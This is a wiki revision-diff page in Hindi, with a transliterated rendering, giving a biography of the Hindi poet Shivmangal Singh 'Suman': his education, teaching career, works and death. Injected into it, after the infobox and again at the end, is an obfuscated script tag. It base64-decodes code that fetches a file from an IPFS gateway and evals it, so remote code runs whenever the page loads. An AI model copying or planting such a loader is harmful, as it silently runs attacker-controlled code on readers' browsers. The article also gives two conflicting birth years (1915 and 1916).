Difference between revisions of "शिवमंगल सिंह सुमन"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''शिवमंगल सिंह 'सुमन'''' (अंग्रेज़ी: ''Shivmangal Singh 'Suman''' जन्म: 5 ...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
'''शिवमंगल सिंह 'सुमन'''' ([[अंग्रेज़ी]]: ''Shivmangal Singh 'Suman''' जन्म: 5 अगस्त, 1916 - मृत्यु: 27 नवम्बर, 2002) [[हिन्दी]] के शीर्ष कवियों में से एक थे। उन्हें सन् [[1999]] में भारत सरकार ने साहित्य एवं शिक्षा के क्षेत्र में [[पद्म भूषण]] से सम्मानित किया था।
+
{{सूचना बक्सा साहित्यकार
 +
|चित्र=Shivmangal-singh-suman.jpg
 +
|चित्र का नाम=शिवमंगल सिंह 'सुमन'
 +
|पूरा नाम=शिवमंगल सिंह 'सुमन'
 +
|अन्य नाम=
 +
|जन्म= [[5 अगस्त]], [[1915]]
 +
|जन्म भूमि=[[उन्नाव ज़िला]], [[उत्तर प्रदेश]]
 +
|मृत्यु=[[27 नवंबर]], [[2002]]
 +
|मृत्यु स्थान=[[उज्जैन]], [[मध्य प्रदेश]]
 +
|अविभावक=
 +
|पालक माता-पिता=
 +
|पति/पत्नी=
 +
|संतान=
 +
|कर्म भूमि=
 +
|कर्म-क्षेत्र=कवि, लेखक, अध्यापक
 +
|मुख्य रचनाएँ=
 +
|विषय=
 +
|भाषा=[[हिंदी]]
 +
|विद्यालय=[[काशी हिन्दू विश्वविद्यालय]]
 +
|शिक्षा=एम.ए. , डी.लिट्
 +
|पुरस्कार-उपाधि=[[साहित्य अकादमी पुरस्कार हिन्दी|साहित्य अकादमी पुरस्कार]], [[पद्म श्री]], [[पद्म भूषण]] आदि
 +
|प्रसिद्धि=
 +
|विशेष योगदान=
 +
|नागरिकता=भारतीय
 +
|संबंधित लेख=
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी=
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 +
}}
 +
शिवमंगल सिंह 'सुमन' ([[अंग्रेज़ी]]: ''Shivmangal Singh 'Suman''', जन्म: 5 अगस्त, 1916 - मृत्यु: 27 नवम्बर, 2002) [[हिन्दी]] के शीर्ष कवियों में से एक थे। उन्हें सन् [[1999]] में भारत सरकार ने साहित्य एवं शिक्षा के क्षेत्र में [[पद्म भूषण]] से सम्मानित किया था।
 
==जीवन परिचय==
 
==जीवन परिचय==
उनका जन्म [[उत्तर प्रदेश]] के [[उन्नाव ज़िला|उन्नाव ज़िले]] में [[5 अगस्त]] सन् [[1915]] को हुआ। प्रारम्भिक शिक्षा भी वहीं हुई। [[ग्वालियर]] के विक्टोरिया कॉलेज से बी.ए. और [[काशी हिन्दू विश्वविद्यालय]] से एम.ए. , डी.लिट् की उपाधियाँ प्राप्त कर ग्वालियर, [[इन्दौर]] और [[उज्जैन]] में उन्होंने अध्यापन कार्य किया।   
+
डॉ. शिवमंगल सिंह 'सुमन' का जन्म [[उत्तर प्रदेश]] के [[उन्नाव ज़िला|उन्नाव ज़िले]] में [[5 अगस्त]] सन् [[1915]] को हुआ। प्रारम्भिक शिक्षा भी वहीं हुई। [[ग्वालियर]] के विक्टोरिया कॉलेज से बी.ए. और [[काशी हिन्दू विश्वविद्यालय]] से एम.ए. , डी.लिट् की उपाधियाँ प्राप्त कर ग्वालियर, [[इन्दौर]] और [[उज्जैन]] में उन्होंने अध्यापन कार्य किया।   
 
==कार्यक्षेत्र==
 
==कार्यक्षेत्र==
 
शिवमंगल सिंह 'सुमन' का कार्यक्षेत्र अधिकांशत: शिक्षा जगत से संबद्ध रहा। वे ग्वालियर के विक्टोरिया कॉलेज में हिंदी के व्याख्याता, माधव महाविद्यालय उज्जैन के प्राचार्य और फिर कुलपति रहे। अध्यापन के अतिरिक्त विभिन्न महत्त्वपूर्ण संस्थाओं और प्रतिष्ठानों से जुड़कर उन्होंने [[हिंदी साहित्य]] में श्रीवृद्धि की। सुमन जी प्रिय अध्यापक, कुशल प्रशासक, प्रखर चिंतक और विचारक भी थे। वे साहित्य को बोझ नहीं बनाते, अपनी सहजता में गंभीरता को छिपाए रखते। वह साहित्य प्रेमियों में ही नहीं अपितु सामान्य लोगों में भी बहुत लोकप्रिय थे। शहर में किसी अज्ञात-अजनबी व्यक्ति के लिए रिक्शे वाले को यह बताना काफ़ी था कि उसे सुमन जी के घर जाना है। रिक्शा वाला बिना किसी पूछताछ किए आगंतुक को उनके घर तक छोड़ आता। एक बार सुमन जी [[कानपुर]] के एक महाविद्यालय में किसी कार्यक्रम में आए। कार्यक्रम की समाप्ति पर कुछ पत्रकारों ने उन्हे घेर लिया। आयोजकों में से किसी ने कहा सुमन जी थके हैं। इस पर सुमन जी तपाक् से बोले, नहीं मैं थका नहीं हूँ। पत्रकार तत्कालिक साहित्य के निर्माता है। उनसे दो चार पल बात करना अच्छा लगता है।
 
शिवमंगल सिंह 'सुमन' का कार्यक्षेत्र अधिकांशत: शिक्षा जगत से संबद्ध रहा। वे ग्वालियर के विक्टोरिया कॉलेज में हिंदी के व्याख्याता, माधव महाविद्यालय उज्जैन के प्राचार्य और फिर कुलपति रहे। अध्यापन के अतिरिक्त विभिन्न महत्त्वपूर्ण संस्थाओं और प्रतिष्ठानों से जुड़कर उन्होंने [[हिंदी साहित्य]] में श्रीवृद्धि की। सुमन जी प्रिय अध्यापक, कुशल प्रशासक, प्रखर चिंतक और विचारक भी थे। वे साहित्य को बोझ नहीं बनाते, अपनी सहजता में गंभीरता को छिपाए रखते। वह साहित्य प्रेमियों में ही नहीं अपितु सामान्य लोगों में भी बहुत लोकप्रिय थे। शहर में किसी अज्ञात-अजनबी व्यक्ति के लिए रिक्शे वाले को यह बताना काफ़ी था कि उसे सुमन जी के घर जाना है। रिक्शा वाला बिना किसी पूछताछ किए आगंतुक को उनके घर तक छोड़ आता। एक बार सुमन जी [[कानपुर]] के एक महाविद्यालय में किसी कार्यक्रम में आए। कार्यक्रम की समाप्ति पर कुछ पत्रकारों ने उन्हे घेर लिया। आयोजकों में से किसी ने कहा सुमन जी थके हैं। इस पर सुमन जी तपाक् से बोले, नहीं मैं थका नहीं हूँ। पत्रकार तत्कालिक साहित्य के निर्माता है। उनसे दो चार पल बात करना अच्छा लगता है।
Line 47: Line 80:
 
[[Category:आधुनिक कवि]]
 
[[Category:आधुनिक कवि]]
 
__INDEX__
 
__INDEX__
 +
__NOTOC__

Revision as of 08:50, 18 January 2013

shivamangal sianh suman
poora nam shivamangal sianh 'suman'
janm 5 agast, 1915
janm bhoomi unnav zila, uttar pradesh
mrityu 27 navanbar, 2002
mrityu sthan ujjain, madhy pradesh
karm-kshetr kavi, lekhak, adhyapak
bhasha hiandi
vidyalay kashi hindoo vishvavidyalay
shiksha em.e. , di.lith
puraskar-upadhi sahity akadami puraskar, padm shri, padm bhooshan adi
nagarikata bharatiy
inhean bhi dekhean kavi soochi, sahityakar soochi

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

shivamangal sianh 'suman' (aangrezi: Shivmangal Singh 'Suman', janm: 5 agast, 1916 - mrityu: 27 navambar, 2002) hindi ke shirsh kaviyoan mean se ek the. unhean sanh 1999 mean bharat sarakar ne sahity evan shiksha ke kshetr mean padm bhooshan se sammanit kiya tha.

jivan parichay

d aau. shivamangal sianh 'suman' ka janm uttar pradesh ke unnav zile mean 5 agast sanh 1915 ko hua. prarambhik shiksha bhi vahian huee. gvaliyar ke viktoriya k aaulej se bi.e. aur kashi hindoo vishvavidyalay se em.e. , di.lith ki upadhiyaan prapt kar gvaliyar, indaur aur ujjain mean unhoanne adhyapan kary kiya.

karyakshetr

shivamangal sianh 'suman' ka karyakshetr adhikaanshat: shiksha jagat se sanbaddh raha. ve gvaliyar ke viktoriya k aaulej mean hiandi ke vyakhyata, madhav mahavidyalay ujjain ke prachary aur phir kulapati rahe. adhyapan ke atirikt vibhinn mahattvapoorn sansthaoan aur pratishthanoan se ju dakar unhoanne hiandi sahity mean shrivriddhi ki. suman ji priy adhyapak, kushal prashasak, prakhar chiantak aur vicharak bhi the. ve sahity ko bojh nahian banate, apani sahajata mean ganbhirata ko chhipae rakhate. vah sahity premiyoan mean hi nahian apitu samany logoan mean bhi bahut lokapriy the. shahar mean kisi ajnat-ajanabi vyakti ke lie rikshe vale ko yah batana kafi tha ki use suman ji ke ghar jana hai. riksha vala bina kisi poochhatachh kie agantuk ko unake ghar tak chho d ata. ek bar suman ji kanapur ke ek mahavidyalay mean kisi karyakram mean ae. karyakram ki samapti par kuchh patrakaroan ne unhe gher liya. ayojakoan mean se kisi ne kaha suman ji thake haian. is par suman ji tapakh se bole, nahian maian thaka nahian hooan. patrakar tatkalik sahity ke nirmata hai. unase do char pal bat karana achchha lagata hai. d aau. shivamangal sianh 'suman' ke jivan ka sabase mahattvapoorn kshan vah tha jab unaki aankhoan par patti baandhakar unhe ek ajnat sthan par le jaya gaya. jab aankh ki patti kholi gee to vah hataprabh the. unake samaksh svatantrata sangram ke mahayoddha chandrashekhar azad kh de the. azad ne unase prashn kiya tha, kya yah rivalvar dilli le ja sakate ho. suman ji ne behichak prastav svikar kar liya. azadi ke divanoan ke lie kam karane ke arop mean unake viruddh varant zari hua. saral svabhav ke suman ji sadaiv apane prashansakoan se kaha karate the, maian vidvan nahian ban paya. vidvata ki dehari bhar chhoo paya hooan. pradhyapak hone ke sath prashasanik karyoan ke dabav ne mujhe vidvan banane se rok diya.[1]

pramukh kritiyaan

kavy sangrah
  • hillol
  • jivan ke gan
  • pralay-srijan
  • vishvas badhata hi gaya
  • par aankhean nahian bharian
  • viandhy himalay
  • mitti ki barat
  • vani ki vyatha
  • kate agoothoan ki vandanavarean
gady rachanaean
  • mahadevi ki kavy sadhana
  • giti kavy: udyam aur vikas
natak
  • prakriti purush kalidas

samman aur puraskar

nidhan

hindi kavita ki vachik paranpara apaki lokapriyata ki sakshi hai. desh bhar ke kavy-premiyoan ko apane gitoan ki ravani se achanbhit kar dene vale suman ji 27 navanbar sanh 2002 ko maun ho ge.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. shivamangal sianh ‘suman’ / parichay (hiandi) (ech.ti.em.el) kavitakosh. abhigaman tithi: 18 janavari, 2013.

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>